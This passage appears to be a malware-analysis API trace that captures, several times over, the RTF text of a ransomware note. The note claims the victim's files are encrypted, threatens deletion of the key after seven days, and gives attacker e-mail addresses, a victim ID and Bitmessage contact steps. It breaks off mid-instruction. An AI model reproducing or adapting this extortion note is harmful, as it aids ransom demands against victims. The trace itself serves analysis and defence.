urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.956] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.956] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r 